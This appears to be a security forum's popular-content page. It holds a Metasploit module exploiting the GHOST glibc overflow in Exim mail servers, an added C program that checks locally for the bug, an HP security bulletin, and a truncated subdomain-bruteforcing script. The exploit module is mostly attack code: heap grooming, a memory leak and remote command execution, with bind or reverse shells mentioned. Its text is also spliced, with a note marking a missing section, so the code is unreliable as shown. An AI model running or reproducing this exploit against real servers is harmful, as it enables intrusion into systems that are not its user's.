
Leaderboard

Popular Content

Showing content with the highest reputation on 03/18/15 in all areas

  1.
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Exim GHOST (glibc gethostbyname) Buffer Overflow',
      'Description'    => %q(
        This module remotely exploits CVE-2015-0235 (a.k.a. GHOST, a heap-based
        buffer overflow in the GNU C Library's gethostbyname functions) on x86
        and x86_64 GNU/Linux systems that run the Exim mail server. Technical
        information about the exploitation can be found in the original GHOST
        advisory, and in the source code of this module.
        ------------------------------------------------------------------------
        SERVER-SIDE REQUIREMENTS (Exim)
        ------------------------------------------------------------------------
        The remote system must use a vulnerable version of the GNU C Library:
        the first exploitable version is glibc-2.6, the last exploitable
        version is glibc-2.17; older versions might be exploitable too, but
        this module depends on the newer versions' fd_nextsize (a member of
        the malloc_chunk structure) to remotely obtain the address of Exim's
        smtp_cmd_buffer in the heap.
        ------------------------------------------------------------------------
        The remote system must run the Exim mail server: the first exploitable
        version is exim-4.77; older versions might be exploitable too, but
        this module depends on the newer versions' 16-KB smtp_cmd_buffer to
        reliably set up the heap as described in the GHOST advisory.
        ------------------------------------------------------------------------
        The remote Exim mail server must be configured to perform extra
        security checks against its SMTP clients: either the
        helo_try_verify_hosts or the helo_verify_hosts option must be enabled;
        the "verify = helo" ACL might be exploitable too, but is unpredictable
        and therefore not supported by this module.
        ------------------------------------------------------------------------
        CLIENT-SIDE REQUIREMENTS (Metasploit)
        ------------------------------------------------------------------------
        This module's "exploit" method requires the SENDER_HOST_ADDRESS option
        to be set to the IPv4 address of the SMTP client (Metasploit), as seen
        by the SMTP server (Exim); additionally, this IPv4 address must have
        both forward and reverse DNS entries that match each other
        (Forward-Confirmed reverse DNS).
        ------------------------------------------------------------------------
        The remote Exim server might be exploitable even if the Metasploit
        client has no FCrDNS, but this module depends on Exim's
        sender_host_name variable to be set in order to reliably control the
        state of the remote heap.
        ------------------------------------------------------------------------
        TROUBLESHOOTING
        ------------------------------------------------------------------------
        "bad SENDER_HOST_ADDRESS (nil)" failure: the SENDER_HOST_ADDRESS option
        was not specified.
        ------------------------------------------------------------------------
        "bad SENDER_HOST_ADDRESS (not in IPv4 dotted-decimal notation)"
        failure: the SENDER_HOST_ADDRESS option was specified, but not in IPv4
        dotted-decimal notation.
        ------------------------------------------------------------------------
        "bad SENDER_HOST_ADDRESS (helo_verify_hosts)" or "bad
        SENDER_HOST_ADDRESS (helo_try_verify_hosts)" failure: the
        SENDER_HOST_ADDRESS option does not match the IPv4 address of the SMTP
        client (Metasploit), as seen by the SMTP server (Exim).
        ------------------------------------------------------------------------
        "bad SENDER_HOST_ADDRESS (no FCrDNS)" failure: the IPv4 address of the
        SMTP client (Metasploit) has no Forward-Confirmed reverse DNS.
        ------------------------------------------------------------------------
        "not vuln? old glibc? (no leaked_arch)" failure: the remote Exim server
        is either not vulnerable, or not exploitable (glibc versions older than
        glibc-2.6 have no fd_nextsize member in their malloc_chunk structure).
        ------------------------------------------------------------------------
        "NUL, CR, LF in addr? (no leaked_addr)" failure: Exim's heap address
        contains bad characters (NUL, CR, LF) and was therefore mangled during
        the information leak; this exploit is able to reconstruct most of
        these addresses, but not all (worst-case probability is ~1/85, but
        could be further improved).
        ------------------------------------------------------------------------
        "Brute-force SUCCESS" followed by a nil reply, but no shell: the remote
        Unix command was executed, but spawned a bind-shell or a reverse-shell
        that failed to connect (maybe because of a firewall, or a NAT, etc).
        ------------------------------------------------------------------------
        "Brute-force SUCCESS" followed by a non-nil reply, and no shell: the
        remote Unix command was executed, but failed to spawn the shell (maybe
        because the setsid command doesn't exist, or awk isn't gawk, or netcat
        doesn't support the -6 or -e option, or telnet doesn't support the -z
        option, etc).
        ------------------------------------------------------------------------
        Comments and questions are welcome!
      ),
      'Author'         => ['Qualys, Inc. <qsa[at]qualys.com>'],
      'License'        => BSD_LICENSE,
      'References'     => [
        ['CVE', '2015-0235'],
        ['US-CERT-VU', '967332'],
        ['OSVDB', '117579'],
        ['BID', '72325'],
        ['URL', 'https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt']
      ],
      'DisclosureDate' => 'Jan 27 2015',
      'Privileged'     => false, # uid=101(Debian-exim) gid=103(Debian-exim) groups=103(Debian-exim)
      'Platform'       => 'unix', # actually 'linux', but we execute a unix-command payload
      'Arch'           => ARCH_CMD, # actually [ARCH_X86, ARCH_X86_64], but ^
      'Payload'        => {
        'Space'         => 255, # the shorter the payload, the higher the probability of code execution
        'BadChars'      => "",  # we encode the payload ourselves, because ^
        'DisableNops'   => true,
        'ActiveTimeout' => 24*60*60 # we may need more than 150 s to execute our bind-shell
      },
      'Targets'        => [['Automatic', {}]],
      'DefaultTarget'  => 0
    ))
    register_options([
      Opt::RPORT(25),
      OptAddress.new('SENDER_HOST_ADDRESS', [false, 'The IPv4 address of the SMTP client (Metasploit), as seen by the SMTP server (Exim)', nil])
    ], self.class)
    register_advanced_options([
      OptBool.new('I_KNOW_WHAT_I_AM_DOING', [false, 'Please read the source code for details', nil])
    ], self.class)
  end

  def check
    # for now, no information about the vulnerable state of the target
    check_code = Exploit::CheckCode::Unknown
    begin
      # not exploiting, just checking
      smtp_connect(false)
      # malloc()ate gethostbyname's buffer, and
      # make sure its next_chunk isn't the top chunk
      9.times do
        smtp_send("HELO ", "", "0", "", "", 1024+16-1+0)
        smtp_recv(HELO_CODES)
      end
      # overflow (4 bytes) gethostbyname's buffer, and
      # overwrite its next_chunk's size field with 0x00303030
      smtp_send("HELO ", "", "0", "", "", 1024+16-1+4)
      # from now on, an exception means vulnerable
      check_code = Exploit::CheckCode::Vulnerable
      # raise an exception if no valid SMTP reply
      reply = smtp_recv(ANY_CODE)
      # can't determine vulnerable state if smtp_verify_helo() isn't called
      return Exploit::CheckCode::Unknown if reply[:code] !~ /#{HELO_CODES}/
      # realloc()ate gethostbyname's buffer, and
      # crash (old glibc) or abort (new glibc)
      # on the overwritten size field
      smtp_send("HELO ", "", "0", "", "", 2048-16-1+4)
      # raise an exception if no valid SMTP reply
      reply = smtp_recv(ANY_CODE)
      # can't determine vulnerable state if smtp_verify_helo() isn't called
      return Exploit::CheckCode::Unknown if reply[:code] !~ /#{HELO_CODES}/
      # a vulnerable target should've crashed by now
      check_code = Exploit::CheckCode::Safe
    rescue
      peer = "#{rhost}:#{rport}"
      vprint_debug("#{peer} - Caught #{$!.class}: #{$!.message}")
    ensure
      smtp_disconnect
    end
    return check_code
  end

  def exploit
    unless datastore['I_KNOW_WHAT_I_AM_DOING']
      print_status("Checking if target is vulnerable...")
      fail_with("exploit", "Vulnerability check failed.") if check != Exploit::CheckCode::Vulnerable
      print_good("Target is vulnerable.")
    end
    information_leak
    code_execution
  end

  private

  HELO_CODES = '250|451|550'
  ANY_CODE = '[0-9]{3}'

  MIN_HEAP_SHIFT = 80
  MIN_HEAP_SIZE = 128 * 1024
  MAX_HEAP_SIZE = 1024 * 1024

  # Exim
  ALIGNMENT = 8
  STORE_BLOCK_SIZE = 8192
  STOREPOOL_MIN_SIZE = 256
  LOG_BUFFER_SIZE = 8192
  BIG_BUFFER_SIZE = 16384
  SMTP_CMD_BUFFER_SIZE = 16384
  IN_BUFFER_SIZE = 8192

  # GNU C Library
  PREV_INUSE = 0x1
  NS_MAXDNAME = 1025

  # Linux
  MMAP_MIN_ADDR = 65536

  def information_leak
    print_status("Trying information leak...")
    leaked_arch = nil
    leaked_addr = []
    # try different heap_shift values, in case Exim's heap address contains
    # bad chars (NUL, CR, LF) and was mangled during the information leak;
    # we'll keep the longest one (the least likely to have been truncated)
    16.times do
      done = catch(:another_heap_shift) do
        heap_shift = MIN_HEAP_SHIFT + (rand(1024) & ~15)
        print_debug("#{{ heap_shift: heap_shift }}")
        # write the malloc_chunk header at increasing offsets (8-byte step),
        # until we overwrite the "503 sender not yet given" error message
        128.step(256, 8) do |write_offset|
          error = try_information_leak(heap_shift, write_offset)
          print_debug("#{{ write_offset: write_offset, error: error }}")
          throw(:another_heap_shift) if not error
          next if error == "503 sender not yet given"
          # try a few more offsets (allows us to double-check things,
          # and distinguish between 32-bit and 64-bit machines)
          error = [error]
          1.upto(5) do |i|
            error[i] = try_information_leak(heap_shift, write_offset + i*8)
            throw(:another_heap_shift) if not error[i]
          end
          print_debug("#{{ error: error }}")
          _leaked_arch = leaked_arch
          if (error[0] == error[1]) and (error[0].empty? or (error[0].unpack('C')[0] & 7) == 0) and # fd_nextsize
             (error[2] == error[3]) and (error[2].empty? or (error[2].unpack('C')[0] & 7) == 0) and # fd
             (error[4] =~ /\A503 send[^e].?\z/mn) and ((error[4].unpack('C*')[8] & 15) == PREV_INUSE) and # size
             (error[5] == "177") # the last \x7F of our BAD1 command, encoded as \\177 by string_printing()
            leaked_arch = ARCH_X86_64
          elsif (error[0].empty? or (error[0].unpack('C')[0] & 3) == 0) and # fd_nextsize
                (error[1].empty? or (error[1].unpack('C')[0] & 3) == 0) and # fd
                (error[2] =~ /\A503 [^s].?\z/mn) and ((error[2].unpack('C*')[4] & 7) == PREV_INUSE) and # size
                (error[3] == "177") # the last \x7F of our BAD1 command, encoded as \\177 by string_printing()
            leaked_arch = ARCH_X86
          else
            throw(:another_heap_shift)
          end
          print_debug("#{{ leaked_arch: leaked_arch }}")
          fail_with("infoleak", "arch changed") if _leaked_arch and _leaked_arch != leaked_arch
          # try different large-bins: most of them should be empty,
          # so keep the most frequent fd_nextsize address
          # (a pointer to the malloc_chunk itself)
          count = Hash.new(0)
          0.upto(9) do |last_digit|
            error = try_information_leak(heap_shift, write_offset, last_digit)
            next if not error or error.length < 2 # heap_shift can fix the 2 least significant NUL bytes
            next if (error.unpack('C')[0] & (leaked_arch == ARCH_X86 ? 7 : 15)) != 0 # MALLOC_ALIGN_MASK
            count[error] += 1
          end
          print_debug("#{{ count: count }}")
          throw(:another_heap_shift) if count.empty?
          # convert count to a nested array of [key, value] arrays and sort it
          error_count = count.sort { |a, b| b[1] <=> a[1] }
          error_count = error_count.first # most frequent
          error = error_count[0]
          count = error_count[1]
          throw(:another_heap_shift) unless count >= 6 # majority
          leaked_addr.push({ error: error, shift: heap_shift })
          # common-case shortcut
          if (leaked_arch == ARCH_X86 and error[0,4] == error[4,4] and error[8..-1] == "er not yet given") or
             (leaked_arch == ARCH_X86_64 and error.length == 6 and error[5].count("\x7E-\x7F").nonzero?)
            leaked_addr = [leaked_addr.last] # use this one, and not another
            throw(:another_heap_shift, true) # done
          end
          throw(:another_heap_shift)
        end
        throw(:another_heap_shift)
      end
      break if done
    end
    fail_with("infoleak", "not vuln? old glibc? (no leaked_arch)") if leaked_arch.nil?
    fail_with("infoleak", "NUL, CR, LF in addr? (no leaked_addr)") if leaked_addr.empty?
    leaked_addr.sort! { |a, b| b[:error].length <=> a[:error].length }
    leaked_addr = leaked_addr.first # longest
    error = leaked_addr[:error]
    shift = leaked_addr[:shift]
    leaked_addr = 0
    (leaked_arch == ARCH_X86 ? 4 : 8).times do |i|
      break if i >= error.length
      leaked_addr += error.unpack('C*')[i] * (2**(i*8))
    end
    # leaked_addr should point to the beginning of Exim's smtp_cmd_buffer:
    leaked_addr -= 2*SMTP_CMD_BUFFER_SIZE + IN_BUFFER_SIZE + 4*(11*1024+shift) + 3*1024 + STORE_BLOCK_SIZE
    fail_with("infoleak", "NUL, CR, LF in addr? (no leaked_addr)") if leaked_addr <= MMAP_MIN_ADDR
    print_good("Successfully leaked_arch: #{leaked_arch}")
    print_good("Successfully leaked_addr: #{leaked_addr.to_s(16)}")
    @leaked = { arch: leaked_arch, addr: leaked_addr }
  end

  def try_information_leak(heap_shift, write_offset, last_digit = 9)
    fail_with("infoleak", "heap_shift") if (heap_shift < MIN_HEAP_SHIFT)
    fail_with("infoleak", "heap_shift") if (heap_shift & 15) != 0
    fail_with("infoleak", "write_offset") if (write_offset & 7) != 0
    fail_with("infoleak", "last_digit") if "#{last_digit}" !~ /\A[0-9]\z/
    smtp_connect
    # bulletproof Heap Feng Shui; the hard part is avoiding:
    # "Too many syntax or protocol errors" (3)
    # "Too many unrecognized commands" (3)
    # "Too many nonmail commands" (10)
    smtp_send("HELO ", "", "0", @sender
    # [the forum post breaks off in the middle of the line above: the rest of
    #  try_information_leak, the code_execution method called from exploit,
    #  and the start of the method whose tail follows are not in the post]
    # avoid a future pathological case by forcing it now:
    # "Do NOT free the first successor, if our current block has less than 256 bytes left."
    smtp_send("MAIL FROM:", "<", method(:rand_text_alpha), ">", "", STOREPOOL_MIN_SIZE + 16)
    smtp_recv(501, 'sender address must contain a domain')
    smtp_send("RSET")
    smtp_recv(250, 'Reset OK')
  end

  def smtp_send(prefix, arg_prefix = nil, arg_pattern = nil, arg_suffix = nil, suffix = nil, arg_length = nil)
    fail_with("smtp_send", "state is #{@smtp_state}") if @smtp_state != :send
    @smtp_state = :sending
    if not arg_pattern
      fail_with("smtp_send", "prefix is nil") if not prefix
      fail_with("smtp_send", "param isn't nil") if arg_prefix or arg_suffix or suffix or arg_length
      command = prefix
    else
      fail_with("smtp_send", "param is nil") unless prefix and arg_prefix and arg_suffix and suffix and arg_length
      length = arg_length - arg_prefix.length - arg_suffix.length
      fail_with("smtp_send", "len is #{length}") if length <= 0
      argument = arg_prefix
      case arg_pattern
      when String
        argument += arg_pattern * (length / arg_pattern.length)
        argument += arg_pattern[0, length % arg_pattern.length]
      when Method
        argument += arg_pattern.call(length)
      end
      argument += arg_suffix
      fail_with("smtp_send", "arglen is #{argument.length}, not #{arg_length}") if argument.length != arg_length
      command = prefix + argument + suffix
    end
    fail_with("smtp_send", "invalid char in cmd") if command.count("^\x20-\x7F") > 0
    fail_with("smtp_send", "cmdlen is #{command.length}") if command.length > SMTP_CMD_BUFFER_SIZE
    command += "\n" # RFC says CRLF, but squeeze as many chars as possible in smtp_cmd_buffer
    # the following loop works around a bug in the put() method:
    # "while (send_idx < send_len)" should be "while (send_idx < buf.length)"
    # (or send_idx and/or send_len could be removed altogether, like here)
    while command and not command.empty?
      num_sent = sock.put(command)
      fail_with("smtp_send", "sent is #{num_sent}") if num_sent <= 0
      fail_with("smtp_send", "sent is #{num_sent}, greater than #{command.length}") if num_sent > command.length
      command = command[num_sent..-1]
    end
    @smtp_state = :recv
  end

  def smtp_recv(expected_code = nil, expected_data = nil)
    fail_with("smtp_recv", "state is #{@smtp_state}") if @smtp_state != :recv
    @smtp_state = :recving
    failure = catch(:failure) do
      # parse SMTP replies very carefully (the information
      # leak injects arbitrary data into multiline replies)
      data = ""
      while data !~ /(\A|\r\n)[0-9]{3}[ ].*\r\n\z/mn
        begin
          more_data = sock.get_once
        rescue
          throw(:failure, "Caught #{$!.class}: #{$!.message}")
        end
        throw(:failure, "no more data") if more_data.nil?
        throw(:failure, "no more data") if more_data.empty?
        data += more_data
      end
      throw(:failure, "malformed reply (count)") if data.count("\0") > 0
      lines = data.scan(/(?:\A|\r\n)[0-9]{3}[ -].*?(?=\r\n(?=[0-9]{3}[ -]|\z))/mn)
      throw(:failure, "malformed reply (empty)") if lines.empty?
      code = nil
      lines.size.times do |i|
        lines[i].sub!(/\A\r\n/mn, "")
        lines[i] += "\r\n"
        if i == 0
          code = lines[i][0,3]
          throw(:failure, "bad code") if code !~ /\A[0-9]{3}\z/mn
          if expected_code and code !~ /\A(#{expected_code})\z/mn
            throw(:failure, "unexpected #{code}, expected #{expected_code}")
          end
        end
        line_begins_with = lines[i][0,4]
        line_should_begin_with = code + (i == lines.size-1 ? " " : "-")
        if line_begins_with != line_should_begin_with
          throw(:failure, "line begins with #{line_begins_with}, " \
                          "should begin with #{line_should_begin_with}")
        end
      end
      throw(:failure, "malformed reply (join)") if lines.join("") != data
      if expected_data and data !~ /#{expected_data}/mn
        throw(:failure, "unexpected data")
      end
      reply = { code: code, lines: lines }
      @smtp_state = :send
      return reply
    end
    fail_with("smtp_recv", "#{failure}") if expected_code
    return nil
  end

  def smtp_disconnect
    disconnect if sock
    fail_with("smtp_disconnect", "sock isn't nil") if sock
    @smtp_state = :disconnected
  end
end
    1 point
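The module above exploits GHOST remotely, through Exim's HELO verification; the probe below is an added example (not part of the forum post or of the Qualys module) that shows the underlying glibc bug locally, in the style of the test program from the GHOST advisory. glibc's __nss_hostname_digits_dots(), reached from gethostbyname*() when the name looks like a dotted-decimal IPv4 address, computed the space it needed without counting the alias pointer array, so a name whose length lands exactly on that boundary makes it write sizeof(char *) bytes (4 on x86, 8 on x86_64) past the caller-supplied buffer. The fix shipped in glibc 2.18, which matches the module's "last exploitable version is glibc-2.17". The canary, enum names and helper names here are my own; the length arithmetic follows the advisory. The program only tests the libc the binary is linked against, and says nothing about the Exim-side conditions (helo_verify_hosts and friends) that the module's check probes over SMTP.

```c
/* ghost_probe.c: local check for CVE-2015-0235 (GHOST).
 *
 * Added example modelled on the Qualys advisory's test program; it is not
 * part of the Metasploit module.  A canary is placed directly after a
 * 1024-byte buffer, an all-digits name of the boundary length is resolved
 * with gethostbyname_r(), and the outcome is classified:
 *   - canary clobbered  -> vulnerable (unpatched glibc 2.6 .. 2.17)
 *   - ERANGE returned   -> fixed libc (glibc >= 2.18 or a backport)
 * No network traffic is generated: a numeric name never reaches DNS.
 */
#define _GNU_SOURCE
#include <errno.h>
#include <netdb.h>
#include <stdio.h>
#include <string.h>

#define CANARY "in_the_coal_mine"

enum ghost_result {
    GHOST_NOT_VULNERABLE = 0,  /* libc refused the buffer with ERANGE */
    GHOST_VULNERABLE     = 1,  /* canary overwritten: the overflow happened */
    GHOST_UNEXPECTED     = 2   /* neither: not a glibc-style implementation */
};

/* Buffer and canary live in one struct so they are guaranteed adjacent. */
static struct {
    char buffer[1024];
    char canary[sizeof(CANARY)];
} temp;

/* Length of the all-digits name for which the buggy computation
 *   size_needed = sizeof(*host_addr)   (16 bytes)
 *               + sizeof(*h_addr_ptrs) (2 pointers)
 *               + strlen(name) + 1
 * comes out to exactly sizeof(temp.buffer).  The term it forgot,
 * sizeof(*h_alias_ptr) (one pointer), is what lands past the end. */
size_t ghost_name_length(void)
{
    return sizeof(temp.buffer) - 16 * sizeof(unsigned char) - 2 * sizeof(char *) - 1;
}

enum ghost_result ghost_probe(void)
{
    struct hostent resbuf;
    struct hostent *result = NULL;
    int herrno = 0;
    char name[sizeof(temp.buffer)];
    size_t len = ghost_name_length();

    memset(&temp, 0, sizeof(temp));
    memcpy(temp.canary, CANARY, sizeof(CANARY));

    /* "000...0": digits only, so inet_aton() accepts it and the numeric
     * fast path is taken instead of a resolver lookup. */
    memset(name, '0', len);
    name[len] = '\0';

    int retval = gethostbyname_r(name, &resbuf, temp.buffer, sizeof(temp.buffer),
                                 &result, &herrno);

    if (memcmp(temp.canary, CANARY, sizeof(CANARY)) != 0)
        return GHOST_VULNERABLE;
    if (retval == ERANGE)
        return GHOST_NOT_VULNERABLE;
    return GHOST_UNEXPECTED;
}

int main(void)
{
    switch (ghost_probe()) {
    case GHOST_VULNERABLE:     puts("vulnerable");     return 0;
    case GHOST_NOT_VULNERABLE: puts("not vulnerable"); return 0;
    default:                   puts("unexpected result (not glibc?)"); return 1;
    }
}
```

Build and run with `cc -o ghost_probe ghost_probe.c && ./ghost_probe`. On a 64-bit glibc the name is 991 digits long; on 32-bit it is 999, because two pointers are 8 bytes instead of 16. A fixed libc sees that the buffer is too small and returns ERANGE before writing, which is exactly why the module's first exploitation step (the HELO sizes in check) stops working once the server's glibc is patched.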
  2. HP Security Bulletin HPSBST03298 1 - Potential security vulnerabilities have been identified with HP XP Service Processor Software for Windows. These vulnerabilities could be exploited resulting in a variety of outcomes.

Code:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Note: the current version of the following document is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c04600552

SUPPORT COMMUNICATION - SECURITY BULLETIN

Document ID: c04600552
Version: 1

HPSBST03298 rev.1 - HP XP Service Processor Software for Windows, Multiple Vulnerabilities

NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Release Date: 2015-03-13
Last Updated: 2015-03-13

Potential Security Impact: Multiple vulnerabilities

Source: Hewlett-Packard Company, HP Software Security Response Team

VULNERABILITY SUMMARY
Potential security vulnerabilities have been identified with HP XP Service Processor Software for Windows. These vulnerabilities could be exploited resulting in a variety of outcomes.

References: SSRT101826

SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
The following HP XP Service Processor Software for Windows is affected:
HP XP7
HP XP10000
HP XP12000
HP XP20000
HP XP24000
HP XP P9500

BACKGROUND
For a PGP signed version of this security bulletin please write to: security-alert@hp.com

Microsoft has published Security Information Bulletins since January 2009. This bulletin presents all of the necessary patches and updates for HP XP Service Processor Software in a cumulative format. This information is updated monthly. Updating the HP XP Service Processor Software can be performed without interference or disruption to data flow on the XP product.

RESOLUTION
HP has made a web-based spreadsheet available which lists all updates to the HP XP Service Processor Software that runs on the Microsoft Windows Operating System. The OS versions include Windows 7, Windows Vista (64 and 32 bit) and Windows XP.

The document may be downloaded from here: HP Insight Management - Overview

In this HP Enterprise Information Library, select 'Storage' at the top. In the 'Products and Solutions' column, select 'XP Storage'. In the 'Information Type' column, select only 'Service and Maintenance'. The HP XP Service Processor (SVP) OS Security Patch Summary Sheet may be downloaded to your desktop.

HISTORY
Version:1 (rev.1) - 13 March 2015 Initial release

Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.

Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com

Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: HP: Subscribe today

Security Bulletin Archive: A list of recently released Security Bulletins is available here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/

Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM
3P = 3rd Party Software
GN = HP General Software
HF = HP Hardware and Firmware
MP = MPE/iX
MU = Multi-Platform Software
NS = NonStop Servers
OV = OpenVMS
PI = Printing and Imaging
PV = ProCurve
ST = Storage Software
TU = Tru64 UNIX
UX = HP-UX

Copyright 2015 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP nor its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.13 (GNU/Linux)

iEYEARECAAYFAlUHov8ACgkQ4B86/C0qfVnbrgCg4oVyYhIvPf8/mkS/IwjWrMRg
blEAn3uS87tqYInkFZtz8QNOjlVcU7l0
=6XaT
-----END PGP SIGNATURE-----

Source: http://dl.packetstormsecurity.net/1503-advisories/HPSBST03298-1.txt
    1 point
  3.
#!/usr/bin/env python2
# -*- coding: latin-1 -*-
################################################################################
#               ____                     _ __
#    ___  __ __/ / /__ ___ ______ ______(_) /___ __
#   / _ \/ // / / (_-</ -_) __/ // / __/ / __/ // /
#  /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, /
#                                           /___/ team
#
# dnsspider.py - multithreaded subdomain bruteforcer
#
# DATE
# 08/16/2012
#
# DESCRIPTION
# A very fast multithreaded bruteforcer of subdomains that leverages a
# wordlist and/or character permutation.
#
# AUTHOR
# noptrix - http://www.nullsecurity.net/
#
# NOTES:
# quick'n'dirty code
#
# TODO:
# - attack while mutating -> don't generate whole list when using -t 1
#
# CHANGELOG:
# v0.6
# - upgraded default wordlist
# - replaced optionparser with argparse
# - add version output option
# - fixed typo
#
# v0.5
# - fixed extracted ip addresses from rrset answers
# - renamed file (removed version string)
# - removed trailing whitespaces
# - removed color output
# - changed banner
#
# v0.4
# - fixed a bug for returned list
# - added postfix option
# - upgraded wordlist[]
# - colorised output
# - changed error messages
#
# v0.3:
# - added verbose/quiet mode - default is quiet now
# - fixed try/catch for domainnames
# - fixed some tab width (i normally use <= 80 chars per line)
#
# v0.2:
# - append DNS and IP output to found list
# - added diffound list for subdomains resolved to different addresses
# - get right ip address from current used iface to avoid socket problems
# - fixed socket exception syntax and output
# - added usage note for fixed port and multithreaded socket exception
#
# v0.1:
# - initial release
################################################################################

import sys
import time
import string
import itertools
import socket
import threading
import re
import argparse

try:
    import dns.message
    import dns.query
except ImportError:
    print("[-] ERROR: you need 'dnspython' package")
    sys.exit()

BANNER = '--==[ dnsspider by noptrix@nullsecurity.net ]==--'
USAGE = '\n\n' \
        '  dnsspider.py -t <arg> -a <arg> [options]'
VERSION = 'v0.6'
defaults = {}
hostnames = []
prefix = ''
postfix = ''
found = []
diffound = []
chars = string.ascii_lowercase
digits = string.digits

# default wordlist (the forum post is cut off part-way through this list)
wordlist = [
    '0', '01', '02', '03', '1', '10', '11', '12', '13', '14', '15', '16', '17',
    '18', '19', '2', '20', '3', '3com', '4', '5', '6', '7', '8', '9', 'ILMI',
    'a', 'a.auth-ns', 'a01', 'a02', 'a1', 'a2', 'abc', 'about', 'ac',
    'academico', 'acceso', 'access', 'accounting', 'accounts', 'acid',
    'activestat', 'ad', 'adam', 'adkit', 'adm', 'admin', 'administracion',
    'administrador', 'administrator', 'administrators', 'admins', 'ads',
    'adserver', 'adsl', 'ae', 'af', 'affiliate', 'affiliates', 'afiliados',
    'ag', 'agenda', 'agent', 'ai', 'aix', 'ajax', 'ak', 'akamai', 'al',
    'alabama', 'alaska', 'albuquerque', 'alerts', 'alpha', 'alterwind', 'am',
    'amarillo', 'americas', 'an', 'anaheim', 'analyzer', 'announce',
    'announcements', 'antivirus', 'ao', 'ap', 'apache', 'apollo', 'app',
    'app01', 'app1', 'apple', 'application', 'applications', 'apps',
    'appserver', 'aq', 'ar', 'archie', 'arcsight', 'argentina', 'arizona',
    'arkansas', 'arlington', 'as', 'as400', 'asia', 'asterix', 'at', 'athena',
    'atlanta', 'atlas', 'att', 'au', 'auction', 'austin', 'auth', 'auto',
    'autodiscover', 'autorun', 'av', 'aw', 'ayuda', 'az', 'b', 'b.auth-ns',
    'b01', 'b02', 'b1', 'b2', 'b2b', 'b2c', 'ba', 'back', 'backend', 'backup',
    'backups', 'baker', 'bakersfield', 'balance', 'balancer', 'baltimore',
    'banking', 'bayarea', 'bb', 'bbdd', 'bbs', 'bd', 'bdc', 'be', 'bea',
    'beta', 'bf', 'bg', 'bh', 'bi', 'bill', 'billing', 'biz', 'biztalk', 'bj',
    'black', 'blackberry', 'blog', 'blogs', 'blue', 'bm', 'bn', 'bnc', 'bo',
    'board', 'bob', 'bof', 'boise', 'bolsa', 'border', 'boston', 'boulder',
    'boy', 'br', 'bravo', 'brazil', 'britian', 'broadcast', 'broker', 'bronze',
    'brown',
'bs', 'bsd', 'bsd0', 'bsd01', 'bsd02', 'bsd1', 'bsd2', 'bt', 'bug', 'buggalo', 'bugs', 'bugzilla', 'build', 'bulletins', 'burn', 'burner', 'buscador', 'buy', 'bv', 'bw', 'by', 'bz', 'c', 'c.auth-ns', 'ca', 'cache', 'cafe', 'calendar', 'california', 'call', 'calvin', 'canada', 'canal', 'canon', 'careers', 'cart', 'catalog', 'cc', 'cd', 'cdburner', 'cdn', 'central', 'cert', 'certificates', 'certify', 'certserv', 'certsrv', 'cf', 'cg', 'cgi', 'ch', 'channel', 'channels', 'charlie', 'charlotte', 'chat', 'chats', 'chatserver', 'check', 'checkpoint', 'chi', 'chicago', 'ci', 'cims', 'cincinnati', 'cisco', 'citrix', 'ck', 'cl', 'class', 'classes', 'classifieds', 'classroom', 'cleveland', 'cli', 'clicktrack', 'client', 'clientes', 'clients', 'club', 'clubs', 'cluster', 'clusters', 'cm', 'cmail', 'cms', 'cn', 'co', 'cocoa', 'code', 'coldfusion', 'colombus', 'colorado', 'columbus', 'com', 'commerce', 'commerceserver', 'communigate', 'community', 'compaq', 'compras', 'con', 'concentrator', 'conf', 'conference', 'conferencing', 'confidential', 'connect', 'connecticut', 'consola', 'console', 'consult', 'consultant', 'consultants', 'consulting', 'consumer', 'contact', 'content', 'contracts', 'control', 'controller', 'core', 'core0', 'core01', 'corp', 'corpmail', 'corporate', 'correo', 'correoweb', 'cortafuegos', 'counterstrike', 'courses', 'cr', 'cricket', 'crm', 'crs', 'cs', 'cso', 'css', 'ct', 'cu', 'cust1', 'cust10', 'cust100', 'cust101', 'cust102', 'customer', 'customers', 'cv', 'cvs', 'cx', 'cy', 'cz', 'd', 'dallas', 'data', 'database', 'database01', 'database02', 'database1', 'database2', 'databases', 'datastore', 'datos', 'david', 'db', 'db0', 'db01', 'db02', 'db1', 'db2', 'dc', 'de', 'dealers', 'dec', 'def', 'default', 'defiant', 'delaware', 'dell', 'delta', 'delta1', 'demo', 'demonstration', 'demos', 'denver', 'depot', 'des', 'desarrollo', 'descargas', 'design', 'designer', 'desktop', 'detroit', 'dev', 'dev0', 'dev01', 'dev1', 'devel', 'develop', 'developer', 
